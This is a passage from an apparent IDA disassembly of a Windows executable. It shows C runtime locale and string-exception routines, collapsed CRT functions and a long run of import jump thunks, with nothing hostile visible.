loc_4398A5: ; CODE XREF: sub_439390+E�j
; sub_439390+1A�j
mov esp, ebp
pop ebp
retn
sub_439390 endp
; ---------------------------------------------------------------------------
off_4398A9 dd offset loc_439718 ; DATA XREF: sub_439390+91�r
dd offset loc_439563
dd offset loc_4394EE
dd offset loc_439428
dd offset loc_439466
dd offset loc_4394C7
dd offset loc_439515
dd offset loc_43953C
dd offset loc_4395AA
dd offset loc_4394A4
dd offset loc_4397FA
byte_4398D5 db 0 ; DATA XREF: sub_439390+8B�r
dw 0A0Ah
dd 5 dup(0A0A0A0Ah), 10A0A0Ah, 0A0A0A0Ah, 0A020A0Ah, 30A0A0Ah
dd 4 dup(0A0A0A0Ah), 10A0A0Ah, 0A040A0Ah, 0A050A0Ah, 60A0A0Ah
dd 0A0A0A0Ah, 0A08070Ah, 90A0A0Ah
off_439928 dd offset loc_439447 ; DATA XREF: sub_439390+B0�r
dd offset loc_439451
dd offset loc_439457
dd offset loc_43945D
off_439938 dd offset loc_439485 ; DATA XREF: sub_439390+EE�r
dd offset loc_43948F
dd offset loc_439495
dd offset loc_43949B
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_439950 proc near ; CODE XREF: __get_lc_time+41�p
; __get_lc_time+60�p ...
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = byte ptr -8Ch
Source = dword ptr -0Ch
Count = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 0A8h
cmp [ebp+arg_0], 1
jnz loc_439AB9
mov eax, [ebp+arg_C]
mov [ebp+var_90], eax
lea ecx, [ebp+var_8C]
mov [ebp+Source], ecx
mov [ebp+var_4], 0
mov [ebp+var_94], 80h
push 0
mov edx, [ebp+var_94]
push edx
mov eax, [ebp+Source]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
call ___crtGetLocaleInfoA
add esp, 14h
mov [ebp+Count], eax
cmp [ebp+Count], 0
jnz loc_439A3F
call ds:dword_4F6394 ; RtlGetLastWin32Error
cmp eax, 7Ah
jz short loc_4399C0
jmp loc_439A9D
; ---------------------------------------------------------------------------
loc_4399C0: ; CODE XREF: sub_439950+69�j
push 0
push 0
push 0
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
call ___crtGetLocaleInfoA
add esp, 14h
mov [ebp+var_94], eax
cmp [ebp+var_94], 0
jnz short loc_4399EA
jmp loc_439A9D
; ---------------------------------------------------------------------------
loc_4399EA: ; CODE XREF: sub_439950+93�j
push 58h
push offset aInithelp_c ; "inithelp.c"
push 2
mov edx, [ebp+var_94]
push edx
call __malloc_dbg
add esp, 10h
mov [ebp+Source], eax
cmp [ebp+Source], 0
jnz short loc_439A10
jmp loc_439A9D
; ---------------------------------------------------------------------------
loc_439A10: ; CODE XREF: sub_439950+B9�j
mov [ebp+var_4], 1
push 0
mov eax, [ebp+var_94]
push eax
mov ecx, [ebp+Source]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
call ___crtGetLocaleInfoA
add esp, 14h
mov [ebp+Count], eax
cmp [ebp+Count], 0
jnz short loc_439A3F
jmp short loc_439A9D
; ---------------------------------------------------------------------------
loc_439A3F: ; CODE XREF: sub_439950+5A�j
; sub_439950+EB�j
push 63h
push offset aInithelp_c ; "inithelp.c"
push 2
mov ecx, [ebp+Count]
push ecx
call __malloc_dbg
add esp, 10h
mov edx, [ebp+var_90]
mov [edx], eax
mov eax, [ebp+var_90]
cmp dword ptr [eax], 0
jnz short loc_439A69
jmp short loc_439A9D
; ---------------------------------------------------------------------------
loc_439A69: ; CODE XREF: sub_439950+115�j
mov ecx, [ebp+Count]
push ecx ; Count
mov edx, [ebp+Source]
push edx ; Source
mov eax, [ebp+var_90]
mov ecx, [eax]
push ecx ; Dest
call _strncpy
add esp, 0Ch
cmp [ebp+var_4], 0
jz short loc_439A96
push 2
mov edx, [ebp+Source]
push edx
call __free_dbg
add esp, 8
loc_439A96: ; CODE XREF: sub_439950+136�j
xor eax, eax
jmp loc_439BD6
; ---------------------------------------------------------------------------
loc_439A9D: ; CODE XREF: sub_439950+6B�j
; sub_439950+95�j ...
cmp [ebp+var_4], 0
jz short loc_439AB1
push 2
mov eax, [ebp+Source]
push eax
call __free_dbg
add esp, 8
loc_439AB1: ; CODE XREF: sub_439950+151�j
or eax, 0FFFFFFFFh
jmp loc_439BD6
; ---------------------------------------------------------------------------
loc_439AB9: ; CODE XREF: sub_439950+D�j
cmp [ebp+arg_0], 0
jnz loc_439BD3
mov [ebp+var_A4], 4
mov ecx, [ebp+arg_C]
mov [ebp+var_9C], ecx
push 0
mov edx, [ebp+var_A4]
push edx
push offset byte_4F4AFC
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
call ___crtGetLocaleInfoW
add esp, 14h
test eax, eax
jnz short loc_439B00
or eax, 0FFFFFFFFh
jmp loc_439BD6
; ---------------------------------------------------------------------------
loc_439B00: ; CODE XREF: sub_439950+1A6�j
mov edx, [ebp+var_9C]
mov byte ptr [edx], 0
mov [ebp+var_A0], 0
jmp short loc_439B24
; ---------------------------------------------------------------------------
loc_439B15: ; CODE XREF: sub_439950:loc_439BCA�j
mov eax, [ebp+var_A0]
add eax, 1
mov [ebp+var_A0], eax
loc_439B24: ; CODE XREF: sub_439950+1C3�j
cmp [ebp+var_A0], 4
jge loc_439BCF
cmp SrcSizeInBytes, 1
jle short loc_439B6B
push 4 ; Type
mov ecx, [ebp+var_A0]
mov dl, byte_4F4AFC[ecx*2]
mov byte ptr [ebp+var_98], dl
mov eax, [ebp+var_98]
and eax, 0FFh
push eax ; C
call __isctype
add esp, 8
mov [ebp+var_A8], eax
jmp short loc_439B9E
; ---------------------------------------------------------------------------
loc_439B6B: ; CODE XREF: sub_439950+1E8�j
mov ecx, [ebp+var_A0]
mov dl, byte_4F4AFC[ecx*2]
mov byte ptr [ebp+var_98], dl
mov eax, [ebp+var_98]
and eax, 0FFh
mov ecx, off_454E04
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 4
mov [ebp+var_A8], edx
loc_439B9E: ; CODE XREF: sub_439950+219�j
cmp [ebp+var_A8], 0
jz short loc_439BC8
mov eax, [ebp+var_9C]
movsx ecx, byte ptr [eax]
imul ecx, 0Ah
movsx edx, byte ptr [ebp+var_98]
lea eax, [ecx+edx-30h]
mov ecx, [ebp+var_9C]
mov [ecx], al
jmp short loc_439BCA
; ---------------------------------------------------------------------------
loc_439BC8: ; CODE XREF: sub_439950+255�j
jmp short loc_439BCF
; ---------------------------------------------------------------------------
loc_439BCA: ; CODE XREF: sub_439950+276�j
jmp loc_439B15
; ---------------------------------------------------------------------------
loc_439BCF: ; CODE XREF: sub_439950+1DB�j
; sub_439950:loc_439BC8�j
xor eax, eax
jmp short loc_439BD6
; ---------------------------------------------------------------------------
loc_439BD3: ; CODE XREF: sub_439950+16D�j
or eax, 0FFFFFFFFh
loc_439BD6: ; CODE XREF: sub_439950+148�j
; sub_439950+164�j ...
mov esp, ebp
pop ebp
retn
sub_439950 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
mov eax, off_456038
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [0000026D BYTES: COLLAPSED FUNCTION ___crtGetStringTypeW. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000101 BYTES: COLLAPSED FUNCTION __strnicmp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000073 BYTES: COLLAPSED FUNCTION __setmode. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000CF BYTES: COLLAPSED FUNCTION __setmode_lk. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000043D BYTES: COLLAPSED FUNCTION ___ld12mul. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000C3 BYTES: COLLAPSED FUNCTION ___multtenpow12. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000004F BYTES: COLLAPSED FUNCTION __mbsnbicoll. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000AE BYTES: COLLAPSED FUNCTION ___wtomb_environ. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000195 BYTES: COLLAPSED FUNCTION ___crtGetLocaleInfoW. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000001A5 BYTES: COLLAPSED FUNCTION ___crtGetLocaleInfoA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000003F8 BYTES: COLLAPSED FUNCTION ___crtCompareStringA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000050 BYTES: COLLAPSED FUNCTION _strncnt_0. PRESS KEYPAD "+" TO EXPAND]
; [000002E0 BYTES: COLLAPSED FUNCTION ___crtsetenv. PRESS KEYPAD "+" TO EXPAND]
; [0000007C BYTES: COLLAPSED FUNCTION _findenv. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000EE BYTES: COLLAPSED FUNCTION _copy_environ. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000ED BYTES: COLLAPSED FUNCTION __mbschr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B3B0 proc near ; CODE XREF: sub_40DDA0+15�p
; sub_40DE34+15�p ...
var_3C = byte ptr -3Ch
var_38 = byte ptr -38h
var_28 = byte ptr -28h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_43B3B0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 30h
lea eax, [ebp+var_3C]
push eax
push offset aStringTooLong ; "string too long"
lea ecx, [ebp+var_38]
call sub_40DD4D
mov [ebp+var_4], 0
lea ecx, [ebp+var_38]
push ecx
lea ecx, [ebp+var_28]
call sub_43B560
push offset dword_43F458
lea edx, [ebp+var_28]
push edx
call __CxxThrowException@8 ; _CxxThrowException(x,x)
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_43B3B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B410 proc near ; CODE XREF: sub_43B4A0+10�p
; sub_43B680+E�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_43B410
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov [ebp+var_10], ecx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_10]
call ??0exception@@QAE@ABV0@@Z ; exception::exception(exception const &)
mov [ebp+var_4], 0
mov ecx, [ebp+arg_0]
add ecx, 0Ch
push ecx
mov ecx, [ebp+var_10]
add ecx, 0Ch
call sub_40DD23
mov edx, [ebp+var_10]
mov dword ptr [edx], offset off_43F108
mov [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_10]
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn 4
sub_43B410 endp
; ---------------------------------------------------------------------------
align 10h
; [00000016 BYTES: COLLAPSED FUNCTION sub_43B480. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B4A0 proc near ; DATA XREF: .rdata:0043F110�o
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
push ebp
mov ebp, esp
sub esp, 20h
mov [ebp+var_20], ecx
mov eax, [ebp+var_20]
push eax
lea ecx, [ebp+var_1C]
call sub_43B410
push offset dword_43F4C8
lea ecx, [ebp+var_1C]
push ecx
call __CxxThrowException@8 ; _CxxThrowException(x,x)
mov esp, ebp
pop ebp
retn
sub_43B4A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B4D0 proc near ; CODE XREF: sub_43B530+A�p
; sub_43B600+13�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_43B4D0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov [ebp+var_10], ecx
mov eax, [ebp+var_10]
mov dword ptr [eax], offset off_43F108
mov [ebp+var_4], 0
mov ecx, [ebp+var_10]
add ecx, 0Ch
call sub_40DD70
mov [ebp+var_4], 0FFFFFFFFh
mov ecx, [ebp+var_10]
call ??1exception@@UAE@XZ ; exception::~exception(void)
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_43B4D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B530 proc near ; DATA XREF: .rdata:off_43F108�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
call sub_43B4D0
mov eax, [ebp+arg_0]
and eax, 1
test eax, eax
jz short loc_43B555
mov ecx, [ebp+var_4]
push ecx ; void *
call ??3@YAXPAX@Z ; operator delete(void *)
add esp, 4
loc_43B555: ; CODE XREF: sub_43B530+17�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_43B530 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B560 proc near ; CODE XREF: sub_43B3B0+3A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_4]
call sub_43B590
mov ecx, [ebp+var_4]
mov dword ptr [ecx], offset off_43F118
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_43B560 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B590 proc near ; CODE XREF: sub_43B560+E�p
; sub_43B710+E�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_43B590
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 8
mov [ebp+var_14], ecx
mov [ebp+var_10], offset dword_43DF74
lea eax, [ebp+var_10]
push eax
mov ecx, [ebp+var_14]
call ??0exception@@QAE@ABQBD@Z ; exception::exception(char const * const &)
mov [ebp+var_4], 0
mov ecx, [ebp+arg_0]
push ecx
mov ecx, [ebp+var_14]
add ecx, 0Ch
call sub_40DD23
mov edx, [ebp+var_14]
mov dword ptr [edx], offset off_43F108
mov [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_14]
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn 4
sub_43B590 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B600 proc near ; CODE XREF: sub_43B650+A�p
; DATA XREF: .rdata:0043F45C�o
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax], offset off_43F118
mov ecx, [ebp+var_4]
call sub_43B4D0
mov esp, ebp
pop ebp
retn
sub_43B600 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B620 proc near ; DATA XREF: .rdata:0043F120�o
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
push ebp
mov ebp, esp
sub esp, 20h
mov [ebp+var_20], ecx
mov eax, [ebp+var_20]
push eax
lea ecx, [ebp+var_1C]
call sub_43B680
push offset dword_43F458
lea ecx, [ebp+var_1C]
push ecx
call __CxxThrowException@8 ; _CxxThrowException(x,x)
mov esp, ebp
pop ebp
retn
sub_43B620 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B650 proc near ; DATA XREF: .rdata:off_43F118�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
call sub_43B600
mov eax, [ebp+arg_0]
and eax, 1
test eax, eax
jz short loc_43B675
mov ecx, [ebp+var_4]
push ecx ; void *
call ??3@YAXPAX@Z ; operator delete(void *)
add esp, 4
loc_43B675: ; CODE XREF: sub_43B650+17�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_43B650 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B680 proc near ; CODE XREF: sub_43B620+10�p
; DATA XREF: .rdata:0043F440�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_4]
call sub_43B410
mov ecx, [ebp+var_4]
mov dword ptr [ecx], offset off_43F118
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_43B680 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B6B0 proc near ; CODE XREF: sub_40DE9E+17�p
; sub_40E11D+E�p
var_3C = byte ptr -3Ch
var_38 = byte ptr -38h
var_28 = byte ptr -28h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_43B6B0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 30h
lea eax, [ebp+var_3C]
push eax
push offset aInvalidStringP ; "invalid string position"
lea ecx, [ebp+var_38]
call sub_40DD4D
mov [ebp+var_4], 0
lea ecx, [ebp+var_38]
push ecx
lea ecx, [ebp+var_28]
call sub_43B710
push offset dword_43F558
lea edx, [ebp+var_28]
push edx
call __CxxThrowException@8 ; _CxxThrowException(x,x)
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_43B6B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B710 proc near ; CODE XREF: sub_43B6B0+3A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_4]
call sub_43B590
mov ecx, [ebp+var_4]
mov dword ptr [ecx], offset off_43F140
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_43B710 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B740 proc near ; CODE XREF: sub_43B790+A�p
; DATA XREF: .rdata:0043F55C�o
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax], offset off_43F140
mov ecx, [ebp+var_4]
call sub_43B4D0
mov esp, ebp
pop ebp
retn
sub_43B740 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B760 proc near ; DATA XREF: .rdata:0043F148�o
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
push ebp
mov ebp, esp
sub esp, 20h
mov [ebp+var_20], ecx
mov eax, [ebp+var_20]
push eax
lea ecx, [ebp+var_1C]
call sub_43B7C0
push offset dword_43F558
lea ecx, [ebp+var_1C]
push ecx
call __CxxThrowException@8 ; _CxxThrowException(x,x)
mov esp, ebp
pop ebp
retn
sub_43B760 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B790 proc near ; DATA XREF: .rdata:off_43F140�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
call sub_43B740
mov eax, [ebp+arg_0]
and eax, 1
test eax, eax
jz short loc_43B7B5
mov ecx, [ebp+var_4]
push ecx ; void *
call ??3@YAXPAX@Z ; operator delete(void *)
add esp, 4
loc_43B7B5: ; CODE XREF: sub_43B790+17�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_43B790 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B7C0 proc near ; CODE XREF: sub_43B760+10�p
; DATA XREF: .rdata:0043F540�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_4]
call sub_43B410
mov ecx, [ebp+var_4]
mov dword ptr [ecx], offset off_43F140
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_43B7C0 endp
; ---------------------------------------------------------------------------
align 10h
; [00000019 BYTES: COLLAPSED FUNCTION unknown_libname_31. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B810 proc near ; CODE XREF: unknown_libname_31+8�p
push ebp
mov ebp, esp
push offset nullsub_1 ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_43B810 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B830 proc near ; CODE XREF: unknown_libname_31+D�p
push ebp
mov ebp, esp
xor eax, eax
mov al, byte_4F5EBC
and eax, 1
test eax, eax
jnz short loc_43B850
mov cl, byte_4F5EBC
or cl, 1
mov byte_4F5EBC, cl
loc_43B850: ; CODE XREF: sub_43B830+F�j
pop ebp
retn
sub_43B830 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B860 proc near ; CODE XREF: unknown_libname_31+12�p
push ebp
mov ebp, esp
push offset __initp_misc_winxfltr_0 ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_43B860 endp
; ---------------------------------------------------------------------------
align 10h
; [00000005 BYTES: COLLAPSED FUNCTION __initp_misc_winxfltr_0. PRESS KEYPAD "+" TO EXPAND]
align 2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43B886 proc near ; CODE XREF: sub_40E3FF+6F�p
jmp ds:dword_4F6518
sub_43B886 endp
; ---------------------------------------------------------------------------
jmp ds:dword_4F6580
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43B892 proc near ; CODE XREF: sub_40D6D3+5E�p
; sub_40F43A+14A�p ...
jmp ds:dword_4F657C
sub_43B892 endp
; ---------------------------------------------------------------------------
jmp ds:dword_4F6578
; ---------------------------------------------------------------------------
jmp ds:dword_4F6574
; ---------------------------------------------------------------------------
jmp ds:dword_4F6570
; ---------------------------------------------------------------------------
jmp ds:dword_4F656C
; ---------------------------------------------------------------------------
jmp ds:dword_4F6568
; ---------------------------------------------------------------------------
jmp ds:dword_4F6564
; ---------------------------------------------------------------------------
jmp ds:dword_4F6560
; ---------------------------------------------------------------------------
jmp ds:dword_4F655C
; ---------------------------------------------------------------------------
jmp ds:dword_4F6558
; ---------------------------------------------------------------------------
jmp ds:dword_4F6554
; ---------------------------------------------------------------------------
jmp ds:dword_4F6584
; ---------------------------------------------------------------------------
jmp ds:dword_4F654C
; ---------------------------------------------------------------------------
jmp ds:dword_4F6548
; ---------------------------------------------------------------------------
jmp ds:dword_4F6544
; ---------------------------------------------------------------------------
jmp ds:dword_4F6540
; ---------------------------------------------------------------------------
jmp ds:dword_4F653C
; ---------------------------------------------------------------------------
jmp ds:dword_4F6538
; ---------------------------------------------------------------------------
jmp ds:dword_4F6534
; ---------------------------------------------------------------------------
jmp ds:dword_4F6530
; ---------------------------------------------------------------------------
jmp ds:dword_4F6550
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43B910 proc near ; CODE XREF: .text:0041BF8C�p
jmp ds:dword_4F6520
sub_43B910 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43B916 proc near ; CODE XREF: .text:0041BF5F�p
jmp ds:dword_4F6524
sub_43B916 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43B91C proc near ; CODE XREF: .text:0041BF1E�p
jmp ds:dword_4F6528
sub_43B91C endp
; ---------------------------------------------------------------------------
jmp ds:dword_4F636C
; ---------------------------------------------------------------------------
jmp ds:dword_4F6370
; ---------------------------------------------------------------------------
jmp ds:dword_4F6374
; ---------------------------------------------------------------------------
jmp ds:dword_4F6378
; ---------------------------------------------------------------------------
jmp ds:dword_4F637C
; ---------------------------------------------------------------------------
jmp ds:dword_4F6380
; ---------------------------------------------------------------------------
jmp ds:dword_4F6384
; ---------------------------------------------------------------------------
jmp ds:dword_4F6388
; ---------------------------------------------------------------------------
jmp ds:dword_4F638C
; ---------------------------------------------------------------------------
jmp ds:dword_4F6390
; ---------------------------------------------------------------------------
jmp ds:dword_4F6394
; ---------------------------------------------------------------------------
jmp ds:dword_4F6398
; ---------------------------------------------------------------------------
jmp ds:dword_4F639C
; ---------------------------------------------------------------------------
jmp ds:dword_4F63A0
; ---------------------------------------------------------------------------
jmp ds:dword_4F63A4
; ---------------------------------------------------------------------------
jmp ds:dword_4F63A8
; ---------------------------------------------------------------------------
jmp ds:dword_4F63AC
; ---------------------------------------------------------------------------
jmp ds:dword_4F63B0
; ---------------------------------------------------------------------------
jmp ds:dword_4F63B4
; ---------------------------------------------------------------------------
jmp ds:dword_4F63B8
; ---------------------------------------------------------------------------
jmp ds:dword_4F63BC
; ---------------------------------------------------------------------------
jmp ds:dword_4F63C0
; ---------------------------------------------------------------------------
jmp ds:dword_4F63C4
; ---------------------------------------------------------------------------
jmp ds:dword_4F63C8
; ---------------------------------------------------------------------------
jmp ds:dword_4F63CC
; ---------------------------------------------------------------------------
jmp ds:dword_4F63D0
; ---------------------------------------------------------------------------
jmp ds:dword_4F63D4
; ---------------------------------------------------------------------------
jmp ds:dword_4F63D8
; ---------------------------------------------------------------------------
jmp ds:dword_4F63DC
; ---------------------------------------------------------------------------
jmp ds:dword_4F63E0
; ---------------------------------------------------------------------------
jmp ds:dword_4F63E4
; ---------------------------------------------------------------------------
jmp ds:dword_4F63E8
; ---------------------------------------------------------------------------
jmp ds:dword_4F63EC
; ---------------------------------------------------------------------------
jmp ds:dword_4F63F0
; ---------------------------------------------------------------------------
jmp ds:dword_4F63F4
; ---------------------------------------------------------------------------
jmp ds:dword_4F63F8
; ---------------------------------------------------------------------------
jmp ds:dword_4F63FC
; ---------------------------------------------------------------------------
jmp ds:dword_4F6400
; ---------------------------------------------------------------------------
jmp ds:dword_4F6404
; ---------------------------------------------------------------------------
jmp ds:dword_4F6408
; ---------------------------------------------------------------------------
jmp ds:dword_4F640C
; ---------------------------------------------------------------------------
jmp ds:dword_4F6410
; ---------------------------------------------------------------------------
jmp ds:dword_4F6414
; ---------------------------------------------------------------------------
jmp ds:dword_4F6418
; ---------------------------------------------------------------------------
jmp ds:dword_4F641C
; ---------------------------------------------------------------------------
jmp ds:dword_4F6420
; ---------------------------------------------------------------------------
jmp ds:dword_4F6424
; ---------------------------------------------------------------------------
jmp ds:dword_4F6428
; ---------------------------------------------------------------------------
jmp ds:dword_4F642C
; ---------------------------------------------------------------------------
jmp ds:dword_4F6430
; ---------------------------------------------------------------------------
jmp ds:dword_4F6434
; ---------------------------------------------------------------------------
jmp ds:dword_4F6438
; ---------------------------------------------------------------------------
jmp ds:dword_4F643C
; ---------------------------------------------------------------------------
jmp ds:dword_4F62F8
; ---------------------------------------------------------------------------
jmp ds:dword_4F6440
; ---------------------------------------------------------------------------
jmp ds:dword_4F6444
; ---------------------------------------------------------------------------
jmp ds:dword_4F6448
; ---------------------------------------------------------------------------
jmp ds:dword_4F644C
; ---------------------------------------------------------------------------
jmp ds:dword_4F6450
; ---------------------------------------------------------------------------
jmp ds:dword_4F6454
; ---------------------------------------------------------------------------
jmp ds:dword_4F6458
; ---------------------------------------------------------------------------
jmp ds:dword_4F645C
; ---------------------------------------------------------------------------
jmp ds:dword_4F6460
; ---------------------------------------------------------------------------
jmp ds:dword_4F6464
; ---------------------------------------------------------------------------
jmp ds:dword_4F6468
; ---------------------------------------------------------------------------
jmp ds:dword_4F646C
; ---------------------------------------------------------------------------
jmp ds:dword_4F6470
; ---------------------------------------------------------------------------
jmp ds:dword_4F6474
; ---------------------------------------------------------------------------
jmp ds:dword_4F6478
; ---------------------------------------------------------------------------
jmp ds:dword_4F647C
; ---------------------------------------------------------------------------
jmp ds:dword_4F6480
; ---------------------------------------------------------------------------
jmp ds:dword_4F6484
; ---------------------------------------------------------------------------
jmp ds:dword_4F6488
; ---------------------------------------------------------------------------
jmp ds:dword_4F648C
; ---------------------------------------------------------------------------
jmp ds:dword_4F6490
; ---------------------------------------------------------------------------
jmp ds:dword_4F6494
; ---------------------------------------------------------------------------
jmp ds:dword_4F6498
; ---------------------------------------------------------------------------
jmp ds:dword_4F649C
; ---------------------------------------------------------------------------
jmp ds:dword_4F64A0
; ---------------------------------------------------------------------------
jmp ds:dword_4F64A4
; ---------------------------------------------------------------------------
jmp ds:dword_4F64A8
